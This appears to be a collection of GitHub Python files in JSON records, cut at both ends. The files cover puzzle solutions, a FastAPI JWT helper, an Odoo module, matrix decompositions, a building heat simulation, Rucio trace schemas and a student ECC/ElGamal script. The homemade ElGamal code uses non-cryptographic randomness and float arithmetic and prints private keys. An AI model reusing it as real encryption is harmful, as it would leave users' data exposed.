activeneighbours4d(grid, x, y, z, 0)\n currentlyactive = isactive(grid,x,y,z,0)\n #print(\"state\",x,y,z,currentlyactive,neighbours)\n if currentlyactive and neighbours in [2,3]:\n bounds = setactive(nextgrid,bounds,x,y,z,0)\n elif not currentlyactive and neighbours == 3:\n bounds = setactive(nextgrid,bounds,x,y,z,0)\n return nextgrid, bounds\n\ndef activeneighbours4d(grid, x,y,z,w):\n activecount = 0\n for x1 in [x-1, x, x+1]:\n for y1 in [y-1, y, y+1]:\n for z1 in [z-1, z, z+1]:\n for w1 in [w-1, w, w+1]:\n if x1 != x or y1 != y or z1 != z or w1 != w:\n if isactive(grid,x1,y1,z1,w1):\n activecount += 1\n return activecount\n\ndef nextgrid4d(grid, bounds):\n nextgrid = {}\n for x in range(bounds[0][0]-1, bounds[1][0]+2):\n for y in range(bounds[0][1]-1, bounds[1][1]+2):\n for z in range(bounds[0][2]-1, bounds[1][2]+2):\n for w in range(bounds[0][3]-1, bounds[1][3]+2):\n neighbours = activeneighbours4d(grid, x, y, z, w)\n currentlyactive = isactive(grid,x,y,z,w)\n #print(\"state\",x,y,z,currentlyactive,neighbours)\n if currentlyactive and neighbours in [2,3]:\n bounds = setactive(nextgrid,bounds,x,y,z,w)\n elif not currentlyactive and neighbours == 3:\n bounds = setactive(nextgrid,bounds,x,y,z,w)\n return nextgrid, bounds\n\ndef parseInput(lines):\n bignum = 2000000000\n minima = [bignum, bignum, bignum, bignum]\n maxima = [-bignum, -bignum, -bignum, -bignum]\n bbox = [minima, maxima]\n grid = {}\n for y in range(len(lines)):\n for x in range(len(lines[0])):\n if lines[y][x] == \"#\":\n bbox = setactive(grid, bbox, x, y, 0, 0)\n return grid, bbox\n\ndef part1(lines):\n startgrid, bbox = parseInput(lines)\n stepgrid = startgrid.copy()\n for i in range(0,steps):\n stepgrid, bbox = nextgrid3d(stepgrid, bbox)\n print(len(stepgrid))\n\ndef part2(lines):\n startgrid, bbox = parseInput(lines)\n stepgrid = startgrid.copy()\n for i in range(0,steps):\n stepgrid, bbox = nextgrid4d(stepgrid, bbox)\n print(len(stepgrid))\n\n\npart1(lines)\npart2(lines)\n","repo_name":"Arxcis/adventofcode2020","sub_path":"2020/day17/solutions/day17.preng.py","file_name":"day17.preng.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"96"} +{"seq_id":"29175002797","text":"#18. (desafio) Em jogos antigos era possível ver que os desenhos eram compostos por vários triângulos. Como uma maneira de treinar isso, a partir do N dado pelo usuário desenhe um polígono de lado N composto somente por triângulos como na figura:\n\nimport turtle\nimport math\n\ndef poligono(n):\n \n if n < 3:\n \n print('N precisa ser maior ou igual a 3')\n \n else:\n \n turtle.speed('fastest')\n \n angulo_central = (360/n)\n angulo_b = (180-angulo_central)/2\n angulo_c = (180-angulo_central)/2\n \n lado2 = 100\n lado3 = 100\n \n lado1 = (lado2**2 + lado3**2 -2*(lado2*lado3*math.cos(math.radians(angulo_central))))**(1/2)\n print(lado1)\n \n for i in range(0,n):\n \n turtle.forward(lado1)\n turtle.left(180 - angulo_c)\n turtle.forward(lado2)\n turtle.left(180 - angulo_central)\n turtle.forward(lado3)\n turtle.left(180 - angulo_b)\n turtle.forward(lado1)\n turtle.left(angulo_central)\n \n\nn = int(input('Digite o valor de n '))\n \npoligono(n)","repo_name":"lucaslb767/pythonInfnet","sub_path":"fundamentosPython/TP1/questao18.py","file_name":"questao18.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"33854327835","text":"from src.models import Users\nfrom fastapi import status\nfrom fastapi import Depends\nfrom fastapi.exceptions import HTTPException\n\nfrom fastapi.security import OAuth2PasswordBearer\n\nfrom jose import JWTError\nfrom jose import jwt\n\nfrom datetime import (\n datetime,\n timedelta\n)\n\nfrom src.config import (\n auth_config,\n api_config\n)\n\n\nSECRET = auth_config.jwt_secret\nALGORITHM = auth_config.jwt_alg\nACCESS_TOKEN_EXPIRE_MINUTES = auth_config.jwt_exp\noauth2_scheme = OAuth2PasswordBearer(tokenUrl=f'{api_config.api_version_path}/auth/sign_in')\n\n\ndef create_access_token(data: dict):\n to_encode = data.copy()\n expire = datetime.utcnow() + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)\n to_encode.update({\"exp\": expire})\n encoded_jwt = jwt.encode(to_encode, SECRET, algorithm=ALGORITHM)\n return encoded_jwt\n\n\ndef verify_access_token(token: str, credentials_exception):\n try:\n payload = jwt.decode(token, SECRET, algorithms=[ALGORITHM])\n id: str = payload.get('user_id')\n if id is None:\n raise credentials_exception\n token_data = {}\n token_data['user_id'] = id\n except JWTError:\n raise credentials_exception\n return token_data\n\n\nasync def get_current_user(token: str = Depends(oauth2_scheme)) -> Users:\n credentials_exception = HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED, detail='Unauthorized')\n try:\n token_data = verify_access_token(token, credentials_exception)\n except credentials_exception:\n raise credentials_exception\n user = await Users.filter(id=token_data['user_id']).first()\n return user\n","repo_name":"Niatomi/kip-system","sub_path":"backend/src/auth/oauth2.py","file_name":"oauth2.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"71294722237","text":"\nfrom odoo import models, fields, api\n\n\nclass AccountInvoice(models.Model):\n _inherit = 'account.invoice'\n\n picking_ids = fields.One2many('stock.picking', 'bill_id', string='Stock Picking')\n shipment_count = fields.Integer(string='Shipment', compute='_compute_picking_ids')\n\n @api.multi\n def create_shipment(self, force=False):\n print('create_shipment')\n voucher_move_lines = self.invoice_line_ids.filtered(lambda m: m.product_id.id)\n location_bill = self.operating_unit_id.picking_type_id.default_location_src_id\n location_dest_bill = self.operating_unit_id.picking_type_id.default_location_dest_id\n picking_type_bill_id = self.operating_unit_id.picking_type_id\n vals={\n 'location_id': location_bill.id,\n 'location_dest_id': location_dest_bill.id,\n 'picking_type_id': picking_type_bill_id.id,\n 'bill_id': self.id,\n }\n print('vals :',vals)\n picking_id = self.env['stock.picking'].create(vals)\n for line in voucher_move_lines:\n vals_invoice_line = {\n 'picking_id': picking_id.id,\n 'product_id': line.product_id.id,\n 'name': line.name,\n 'product_uom_qty': line.quantity,\n 'product_uom': line.uom_id.id,\n 'location_id': location_bill.id,\n 'location_dest_id': location_dest_bill.id,\n 'remaining_qty': line.quantity,\n }\n print('vals_invoice_line :', vals_invoice_line)\n move_id = self.env['stock.move'].create(vals_invoice_line)\n\n @api.depends('picking_ids')\n def _compute_picking_ids(self):\n for order in self:\n order.shipment_count = len(order.picking_ids)\n\n @api.multi\n def action_view_shipment(self):\n '''\n This function returns an action that display existing delivery orders\n of given sales order ids. It can either be a in a list or in a form\n view, if there is only one delivery order to show.\n '''\n action = self.env.ref('stock.action_picking_tree_all').read()[0]\n\n pickings = self.mapped('picking_ids')\n if len(pickings) > 1:\n action['domain'] = [('id', 'in', pickings.ids)]\n elif pickings:\n action['views'] = [(self.env.ref('stock.view_picking_form').id, 'form')]\n action['res_id'] = pickings.id\n return action","repo_name":"support-itaas/app_shop","sub_path":"itaas_vendor_create_shipment/models/account_invoice.py","file_name":"account_invoice.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9793802963","text":"from typing import List\n\n\nclass Solution:\n def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int:\n M = len(obstacleGrid)\n N = len(obstacleGrid[0])\n memory = [[0] * N for _ in range(M)]\n memory[0][0] = 1\n for i in range(M):\n if obstacleGrid[i][0] != 1:\n memory[i][0] = 1\n else:\n break\n for j in range(N):\n if obstacleGrid[0][j] != 1:\n memory[0][j] = 1\n else:\n break\n for i in range(1, M):\n for j in range(1, N):\n if obstacleGrid[i][j] == 1:\n continue\n else:\n memory[i][j] = memory[i-1][j] + memory[i][j-1]\n return memory[M-1][N-1]","repo_name":"wywlds/leetcode","sub_path":"page2/leet63_different_paths.py","file_name":"leet63_different_paths.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70516840637","text":"import json\n\njson_data = input()\nkeys=input().split(' ')\n\n# {\n# \"key\":\"value\",\n# \"name\": \"Juan Daniel\",\n# \"age\": 26\n# }\n\ndata = json.loads(json_data)\nresult = [0, '']\n\nfor key in keys:\n try:\n result[0] += data[key]\n result[1] += key + ' '\n except:\n error = 0\n\nprint(result[0])\nprint(result[1])","repo_name":"jdrios-dev/MinTic","sub_path":"retos/reto4.py","file_name":"reto4.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"37879331750","text":"\"\"\"Script to test 2-mass-building model\"\"\"\n\nfrom bamLoadBasedTesting.BuildingModels import BAM_RRT_MT\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Create new building model:\nBuilding = BAM_RRT_MT.MTBui_E\nstepSize = 0.5\nT_b = []\nT_H = []\nT_ret = []\nq_flow_hp = []\nq_flow_hb = []\nq_flow_ba = []\nq_flow_bh = []\nq_flow_int = []\nt = []\nt_sup = []\ninternalGains = 0 # 0 W constant internal gains into building\n#loop by doing x steps\nfor x in range(3600*3):\n t.append(x * stepSize)\n \"Step response\"\n if x<3600:\n t_sup.append(52)\n else:\n t_sup.append(Building.t_ret)\n T_ret.append(Building.t_ret)\n \"Do step with Building Model\"\n Building.doStep(t_sup=t_sup[-1], t_ret_mea=T_ret[-1], m_dot=720/3600, stepSize=stepSize, q_dot_int=internalGains)\n \"Save current values:\"\n T_b.append(Building.MassB.T)\n T_H.append(Building.MassH.T)\n q_flow_ba.append(Building.q_dot_ba)\n q_flow_hb.append(Building.q_dot_hb)\n q_flow_hp.append(Building.q_dot_hp)\n q_flow_int.append(Building.q_dot_int)\n q_flow_bh.append(Building.q_dot_bh)\n\nhours = np.array(t)\nhours = hours/3600\nfig, ax = plt.subplots()\nax.plot(hours, T_ret, label = \"return temperature\")\nax.plot(hours, T_H, label = 'transfer system temperature')\nax.plot(hours, t_sup, label = 'supply temperature')\nax.legend()\nplt.grid(True)\nplt.ylabel('[°C]')\nplt.xlabel('time in hours')\nplt.show()\n\nfig, ax = plt.subplots()\nax.plot(hours, q_flow_hp, label = 'heat flow heat pump --> heating system ')\nax.plot(hours, q_flow_hb, label = 'heat flow transfer --> building')\nax.plot(hours, q_flow_ba, label = 'heat flow Building --> Ambient')\nax.plot(hours, q_flow_int, label = 'heat flow internal gains --> building')\nax.plot(hours, q_flow_bh, label = 'heat flow booster heater --> heating system')\nax.legend()\nplt.ylabel('[W]')\nplt.xlabel('time in hours')\nplt.grid(True)\nplt.show()\n\nfig, ax = plt.subplots()\nax.plot(hours, T_b, label = 'building temperature')\nax.legend()\nplt.ylabel('[°C]')\nplt.xlabel('time in hours')\nplt.grid(True)\nplt.show()","repo_name":"BAMresearch/bam-load-based-testing","sub_path":"bamLoadBasedTesting/Example/testModelSim.py","file_name":"testModelSim.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"42564475104","text":"#coding:utf-8\n__author__ = 'jmh081701'\nimport numpy as np\nimport copy\nimport sys\n\nnp.set_printoptions(precision=3,suppress=True)\ndef print_matrix(mat):\n shape=np.shape(mat)\n for i in range(shape[0]):\n for j in range(shape[1]):\n print(round(mat[i,j],3),end=\"\\t\")\n print(end=\"\\n\")\n\ndef LU_decompose(mat):\n mat=copy.deepcopy(mat)\n shape = np.shape(mat)\n if shape[0]!=shape[1]:\n print(\"The matrix is not a square matrix,which cannot be LU decomposed.\")\n return None,None,None\n P=np.zeros(shape)\n U=np.eye(shape[0])\n L=np.eye(shape[0])\n per=[i for i in range(shape[0])] #记录\n for i in range(shape[0]):\n #主元为0,需要进行交换\n j_max=i\n for j in range(i+1,shape[0]):\n if mat[j,i] != 0:\n #向下找到非0绝对值最大的主元,交换上去\n if abs(mat[j,i]) > abs(mat[j_max,i]):\n j_max = j\n\n tmp = copy.deepcopy(mat[i,:])\n mat[i,:] = copy.deepcopy(mat[j_max,:])\n mat[j_max,:] = tmp\n #交换per记录\n tmp = per[i]\n per[i]=per[j_max]\n per[j_max]=tmp\n if mat[i,i]==0:\n print(\"This matrix is single,which cannot be decomposed\")#无法被LU分解\n return None,None,None\n for j in range(i+1,shape[0]):\n if mat[j,i]!=0:\n factor = mat[j,i]/mat[i,i]\n mat[j,i:]=mat[j,i:]-factor * mat[i,i:]\n mat[j,i]=factor\n else:\n continue\n #构建解\n #P矩阵\n for i in range(shape[0]):\n P[i,per[i]]=1\n #L矩阵\n for i in range(shape[0]):\n U[i,i:]=mat[i,i:]\n if i>0:\n L[i,0:i]=mat[i,0:i]\n print(\"LU decompose result.\")\n print('P:')\n print_matrix(P)\n print(\"L:\")\n print_matrix(L)\n print(\"U:\")\n print_matrix(U)\n return np.asmatrix(P),np.asmatrix(L),np.matrix(U)\ndef QR_decompose(mat):\n mat =copy.deepcopy(mat)\n mat = np.asmatrix(mat,dtype=np.float)\n shape = np.shape(mat)\n R= np.eye(shape[1])\n for column in range(shape[1]):\n for i in range(column):\n mat[:,column] = np.asmatrix(mat[:,column])\n project =np.float( (mat[:,i]).T * mat[:,column])\n R[i,column] =project\n for row in range(shape[0]):\n mat[row,column] -=project * mat[row,i]\n\n mat[:,column]=np.asmatrix(mat[:,column])#先转换为矩阵\n magnitude=np.float(np.sqrt((mat[:,column]).T * mat[:,column]))\n if magnitude==0:\n print(\"This Matrix cannot be QR decomposed.\")\n return None,None,None\n for row in range(shape[0]):\n mat[row,column] /=magnitude\n R[column,column]=magnitude\n print(\"QR decompose result.\")\n print(\"Q:\")\n print_matrix(mat)\n print('R:')\n print_matrix(R)\n return np.asmatrix(mat),np.asmatrix(R)\n\ndef HouseholderReduction(mat):\n mat = np.asmatrix(mat,dtype=np.float)\n shape = mat.shape\n R=np.eye(shape[0])\n T=np.zeros(shape=shape)\n for i in range(shape[0]):\n submat = np.asmatrix(mat[i:,i:])\n #把第一列取出来\n x= np.asmatrix(submat[:,0])\n if(x.shape[0]==1):\n continue\n u=copy.deepcopy(x)\n u[0,0]-=np.sqrt(np.float(x.T * x)) #\n print(u.T *u)\n _Ri=np.eye(u.shape[0])-2*u*u.T/(np.float(u.T * u))\n Ri=np.eye(shape[0])\n Ri[i:,i:]=_Ri\n Ri= np.asmatrix(Ri)\n R =Ri *R\n mat=np.asmatrix(mat)\n mat=Ri * mat\n print(\"House Holder Reduce result.\")\n print('P:')\n print_matrix(R.T)\n print('T:')\n print_matrix(mat)\n return np.asmatrix(R,dtype=np.float),np.asmatrix(mat,dtype=np.float)\ndef GivensReduction(mat):\n mat = np.asmatrix(mat,dtype=np.float)\n shape = mat.shape\n P=np.eye(shape[0])\n T=np.zeros(shape=shape)\n for i in range(shape[0]):\n column= np.asmatrix(mat[:,i])\n #把第i列取出来\n if(column.shape[0]==1):\n #第i列只有一个元素了,没必要再约减\n continue\n u=copy.deepcopy(column)\n for row in range(i+1,shape[0]):\n mag=np.sqrt((u[row,0]**2+u[i,0]**2))\n if(mag)==0:\n #自带0行,不用约减\n continue\n c=u[i,0] / mag\n s=u[row,0]/mag\n Pi=np.eye(shape[0])\n Pi[i,i]=c\n Pi[row,row]=c\n Pi[i,row]=s\n Pi[row,i]=-s\n Pi = np.asmatrix(Pi)\n P=Pi*P\n u=Pi*u\n mat=np.asmatrix(mat)\n mat=Pi*mat\n print(\"Givens Reduce result.\")\n print('P')\n print_matrix(P.T)\n print('T')\n print_matrix(mat)\n return np.asmatrix(P,dtype=np.float),np.asmatrix(mat,dtype=np.float)\nif __name__ == '__main__':\n #A=np.asmatrix([[0,-20,-14],[3,27,-4],[4 ,11,-2]])\n #HouseholderReduction(A)\n while True:\n print(\">============================================<\")\n cmd = input(\"please select one from this four method :\\n LU(1)\\t QR(2)\\t HouseHolder Reduction(3)\\t Givens Reduction(4) End(5):\")\n func=None\n if \"1\" in cmd:\n print(\"Your select LU decompose method.\")\n func=LU_decompose\n elif \"2\" in cmd:\n print(\"Your select QR decompose method.\")\n func=QR_decompose\n elif \"3\" in cmd:\n print(\"Your select HouseHolder Reduction method.\")\n func=HouseholderReduction\n elif \"4\" in cmd:\n print(\"Your select Givens Reduction method.\")\n func=GivensReduction\n elif \"5\" in cmd:\n print(\"Bye···\"*3)\n break\n else:\n print(\"Unknow command.\")\n continue\n row_size=input(\"Please input the matrix size(for example 4 4)\\n\\trow size:\")\n col_size=input(\"\\tcol size:\")\n mat=[]\n row_size=int(row_size)\n col_size=int(col_size)\n for i in range(row_size):\n raw_row=input(\"The %d row, each entity seperate by space:\"%i)\n row = raw_row.split(\" \")\n row = [float(each) for each in row]\n mat.append(row)\n mat = np.asmatrix(mat,dtype=np.float)\n func(mat)","repo_name":"jmhIcoding/matrix","sub_path":"decomposition.py","file_name":"decomposition.py","file_ext":"py","file_size_in_byte":6378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"39532904341","text":"##### Criptografia/Descriptografia Assimétrica usando Algorítimos Modernos ######\n'''\n### Criptografia Assimétrica\n# ECC (Elliptic Curve Cryptography): NORMALMENTE USADA PARA ASSINATURA DIGITAL!!!!!\n\n\tA ECC é baseada em operações matemáticas envolvendo curvas elípticas sobre campos finitos.\n\n\tA chave pública em ECC é gerada como um ponto na curva elíptica e a chave privada é um número inteiro.\n\n\tA segurança da ECC baseia-se no problema do logaritmo discreto em uma curva elíptica, que é considerado mais difícil de resolver em\n\t comparação com problemas semelhantes em outros campos. A ECC oferece uma segurança equivalente ao RSA com chaves muito menores, \n\t tornando-a uma escolha atraente para dispositivos com recursos limitados.\n\nCriptografia Direta: El Gamal\n\tBob generates public and private keys: \n\tBob chooses a very large number q and a cyclic group Fq.\n\tFrom the cyclic group Fq, he choose any element g and\n\tan element a such that gcd(a, q) = 1.\n\tThen he computes h = ga.\n\tBob publishes F, h = ga, q, and g as his public key and retains a as private key.\nAlice encrypts data using Bob's public key : \n\tAlice selects an element k from cyclic group F \n\tsuch that gcd(k, q) = 1.\n\tThen she computes p = gk and s = hk = gak.\n\tShe multiples s with M.\n\tThen she sends (p, M*s) = (gk, M*s).\nBob decrypts the message : \n\tBob calculates s' = pa = gak.\n\tHe divides M*s by s' to obtain M as s = s'.\n'''\n\nfrom fastecdsa import keys, curve,ecdsa\nimport random \nfrom math import pow, gcd\n\n### ECC (implementação)\n\n'''\nFonte:\nhttps://medium.com/@schaetzcornelius/learn-how-to-code-elliptic-curve-cryptography-be646d2c9757\nhttps://www.geeksforgeeks.org/elgamal-encryption-algorithm/\nhttps://www.geeksforgeeks.org/blockchain-elliptic-curve-cryptography/ \n'''\n\n\n# ---------------===============----------------=================--------------------========---------------\n# Aqui é a aplicação para assinatura digital\npriv_key, pub_key = keys.gen_keypair(curve.P256)\n\nmessage = 'Method KISS slaps'\n(r,s) = ecdsa.sign(message,priv_key) # gera uma assinatura (r, s) com a chave privada\n\nvalid = ecdsa.verify((r,s),message,pub_key) # Verifica se a assinatura corresponde à chave pública (sem acessar a chave privada)\nif valid == True:\n\tprint(f'\\033[1;32m{valid}\\033[m')\nif not valid == True:\n\traise Exception('A chave privada não pertence ao usuário dessa chave pública!')\nprint('-=-' * 20)\n# ---------------===============-----------------================-----------------=============-------------\n\n# Criptografia direta usando El Gamal\nclass ECCCipher(object):\n\n\tdef __init__(self, ar=2, op=10):\n\t\tself.a = random.randint(ar, op)\n\n\tdef gcd_(self, a, b):\n\t\t'''\n\t\tProcesso descrito no comentário do topo\n\t\t'''\n\t\tif a < b:\n\t\t\treturn gcd(b, a)\n\t\telif a % b == 0:\n\t\t\treturn b\n\t\telse:\n\t\t\treturn gcd(b, a % b)\n\t\t\n\t# gerando números grandes e aleatórios\n\tdef gen_key(self, q):\n\t\tkey = random.randint(pow(10, 20), q)\n\t\twhile self.gcd_(q, key) != 1:\n\t\t\tkey = random.randint(pow(10, 20), q)\n\t\treturn key\n\t\n\tdef power(self, a, b, c):\n\t\t'''\n\t\tProcesso descrito no comentário do topo\n\t\t'''\n\t\tx = 1\n\t\ty = a\n\t\twhile b > 0:\n\t\t\tif b % 2 != 0:\n\t\t\t\tx = (x * y) % c\n\t\t\ty = (y * y) % c\n\t\t\tb = int(b / 2)\n\t\treturn x % c\n\t\n\tdef encrypt(self, msg): # (q, g, h) --> public key \n\t\t\n\t\tq = random.randint(pow(10, 20), pow(10, 50))\n\t\tg = random.randint(2, q)\n\t\tprint(f'original text: {msg}')\n\t\t#print(f'q used = {q}')\n\t\t#print(f'g used = {g}')\n\t\tkey = self.gen_key(q) # chave privada para quem recebe\n\t\th = self.power(g, key, q) # g^a\n\t\t#print(f'g^a (h) used = {h}')\n\n\n\t\ten_msg = []\n\t\n\t\tk = self.gen_key(q) # chave privada para quem envia\n\t\ts = self.power(h, k, q)\n\t\tp = self.power(g, k, q)\n\t\t\n\t\tfor i in range(0, len(str(msg))):\n\t\t\ten_msg.append(str(msg)[i])\n\t\n\t\t#print(\"g^k (p) used =\", p)\n\t\t#print(\"g^ak (s) used =\", s)\n\t\tprint(f'private key (emissor): {k}')\n\t\tprint(f'private key (receptor): {key}')\n\t\tfor i in range(0, len(en_msg)):\n\t\t\ten_msg[i] = s * ord(en_msg[i])\n\n\t\tpublic_key = [p, q]\n\t\tprint(f'public key = {public_key}')\n\t\n\t\treturn en_msg, public_key, key\n\n\tdef decrypt(self, en_msg, public_key, key):\n\t\n\t\tdr_msg = []\n\t\th = self.power(public_key[0], key, public_key[1]) # p^a = g^(ak)\n\t\tfor i in range(0, len(en_msg)):\n\t\t\tdr_msg.append(chr(int(en_msg[i]/h)))\n\t\tdmsg = ''.join(dr_msg)\n\t\treturn dmsg\n\nif __name__ == '__main__':\n\t# ECC tester\n\tmensagem = 1234.132124\n\t\n\tecc1 = ECCCipher(2, 10)\n\t#ECCaply = ecc1.ElGamal(mensagem)\n\tencryption, public_key, key = ecc1.encrypt(mensagem)\n\tdecryption = ecc1.decrypt(encryption, public_key, key)\n\tprint('-=-'*20)\n\tprint(f'mensagem descriptada: {decryption}')\n\t# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n","repo_name":"MrNick-code/Projeto_Computacional-grupo_2","sub_path":"Old_Codes/cripto_assimetrica.py","file_name":"cripto_assimetrica.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"32189241993","text":"import ipaddress\nimport json\nimport logging.handlers\nimport random\nimport socket\n\nimport stomp\nfrom jsonschema import validate, ValidationError, Draft7Validator\n\nfrom rucio.common.config import config_get, config_get_int\nfrom rucio.common.exception import InvalidObject\nfrom rucio.common.logging import rucio_log_formatter\nfrom rucio.common.schema.generic import UUID, TIME_ENTRY, IPv4orIPv6\nfrom rucio.core.monitor import MetricManager\n\nMETRICS = MetricManager(module=__name__)\n\nCONFIG_COMMON_LOGLEVEL = getattr(logging, config_get('common', 'loglevel', raise_exception=False, default='DEBUG').upper())\n\nCONFIG_TRACE_LOGLEVEL = getattr(logging, config_get('trace', 'loglevel', raise_exception=False, default='DEBUG').upper())\nCONFIG_TRACE_LOGFORMAT = config_get('trace', 'logformat', raise_exception=False, default='%(message)s')\nCONFIG_TRACE_TRACEDIR = config_get('trace', 'tracedir', raise_exception=False, default='/var/log/rucio/trace')\nCONFIG_TRACE_MAXBYTES = config_get_int('trace', 'maxbytes', raise_exception=False, default=1000000000)\nCONFIG_TRACE_BACKUPCOUNT = config_get_int('trace', 'backupCount', raise_exception=False, default=10)\n\n# reset root logger handlers. Otherwise everything from ROTATING_LOGGER will also end up in the apache logs.\nlogging.getLogger().handlers = []\n\nLOGGER = logging.getLogger('trace')\nLOGGER.setLevel(CONFIG_COMMON_LOGLEVEL)\n\nROTATING_LOGGER = logging.getLogger('trace_buffer')\nROTATING_LOGGER.setLevel(CONFIG_TRACE_LOGLEVEL)\n\nHANDLER = logging.StreamHandler()\nFORMATTER = rucio_log_formatter()\nHANDLER.setFormatter(FORMATTER)\nLOGGER.addHandler(HANDLER)\n\nROTATING_HANDLER = logging.handlers.RotatingFileHandler(filename='%s/trace' % CONFIG_TRACE_TRACEDIR, maxBytes=CONFIG_TRACE_MAXBYTES, backupCount=CONFIG_TRACE_BACKUPCOUNT)\nROTATING_LOGFORMATTER = logging.Formatter(CONFIG_TRACE_LOGFORMAT)\nROTATING_HANDLER.setFormatter(ROTATING_LOGFORMATTER)\nROTATING_LOGGER.addHandler(ROTATING_HANDLER)\n\nBROKERS_ALIAS, BROKERS_RESOLVED = [], []\ntry:\n BROKERS_ALIAS = [b.strip() for b in config_get('trace', 'brokers').split(',')]\nexcept:\n raise Exception('Could not load brokers from configuration')\n\nPORT = config_get_int('trace', 'port')\nTOPIC = config_get('trace', 'topic')\nUSERNAME = config_get('trace', 'username')\nPASSWORD = config_get('trace', 'password')\nVHOST = config_get('trace', 'broker_virtual_host', raise_exception=False)\n\nTOUCH_SCHEMA = {\n \"description\": \"touch one or more DIDs\",\n \"type\": \"object\",\n \"properties\": {\n \"eventType\": {\"enum\": [\"touch\"]},\n \"clientState\": {\"type\": \"string\"},\n \"account\": {\"type\": \"string\"},\n \"scope\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": [\"string\", \"null\"]},\n \"dataset\": {\"type\": [\"string\", \"null\"]},\n \"traceTimeentry\": TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"localSite\": {\"type\": \"string\"},\n \"remoteSite\": {\"type\": \"string\"},\n \"usrdn\": {\"type\": \"string\"},\n },\n \"required\": ['eventType', 'clientState', 'account', 'traceTimeentry', 'traceTimeentryUnix', 'traceIp', 'traceId']\n}\n\nUPLOAD_SCHEMA = {\n \"description\": \"upload method\",\n \"type\": \"object\",\n \"properties\": {\n \"eventType\": {\"enum\": [\"upload\"]},\n \"hostname\": {\"type\": \"string\"},\n \"eventVersion\": {\"type\": \"string\"},\n \"clientState\": {\"type\": \"string\"},\n \"account\": {\"type\": \"string\"},\n \"uuid\": UUID,\n \"scope\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": [\"string\", \"null\"]},\n \"dataset\": {\"type\": [\"string\", \"null\"]},\n \"remoteSite\": {\"type\": \"string\"},\n \"filesize\": {\"type\": \"number\"},\n \"protocol\": {\"type\": \"string\"},\n \"transferStart\": {\"type\": \"number\"},\n \"transferEnd\": {\"type\": \"number\"},\n \"traceTimeentry\": TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"vo\": {\"type\": \"string\"},\n \"stateReason\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"name\": {\"type\": \"string\"},\n \"usrdn\": {\"type\": \"string\"},\n },\n \"required\": ['hostname', 'account', 'eventType', 'eventVersion', 'uuid', 'scope', 'dataset',\n 'remoteSite', 'filesize', 'protocol', 'transferStart', 'traceTimeentry', 'traceTimeentryUnix',\n 'traceIp', 'traceId']\n}\n\nDOWNLOAD_SCHEMA = {\n \"description\": \"download method\",\n \"type\": \"object\",\n \"properties\": {\n \"eventType\": {\"enum\": [\"download\"]},\n \"hostname\": {\"type\": \"string\"},\n \"eventVersion\": {\"type\": \"string\"},\n \"localSite\": {\"type\": \"string\"},\n \"remoteSite\": {\"type\": \"string\"},\n \"account\": {\"type\": \"string\"},\n \"uuid\": UUID,\n \"scope\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": [\"string\", \"null\"]},\n \"dataset\": {\"type\": [\"string\", \"null\"]},\n \"filesize\": {\"type\": [\"number\", \"null\"]},\n \"clientState\": {\"type\": \"string\"},\n \"stateReason\": {\"type\": \"string\"},\n \"protocol\": {\"type\": \"string\"},\n \"transferStart\": {\"type\": \"number\"},\n \"transferEnd\": {\"type\": \"number\"},\n \"traceTimeentry\": TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"vo\": {\"type\": \"string\"},\n \"usrdn\": {\"type\": \"string\"},\n \"name\": {\"type\": \"string\"},\n },\n \"required\": ['hostname', 'eventType', 'localSite', 'account', 'eventVersion', 'uuid', 'scope',\n 'filename', 'datasetScope', 'dataset', 'filesize', 'clientState', 'stateReason']\n}\n\nGET_SCHEMA = {\n \"description\": \"get method, mainly sent by pilots\",\n \"type\": \"object\",\n \"properties\": {\n \"eventType\": {\"enum\": [\"get\", \"get_sm\", \"sm_get\", \"get_sm_a\", \"sm_get_a\"]},\n \"clientState\": {\"type\": \"string\"},\n \"stateReason\": {\"type\": \"string\"},\n \"url\": {\"type\": [\"string\", \"null\"]},\n \"vo\": {\"type\": \"string\"},\n \"scope\": {\"type\": \"string\"},\n \"eventVersion\": {\"type\": \"string\"},\n \"remoteSite\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": \"string\"},\n \"dataset\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"name\": {\"type\": \"string\"},\n \"traceTimeentry\": TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"usrdn\": {\"type\": 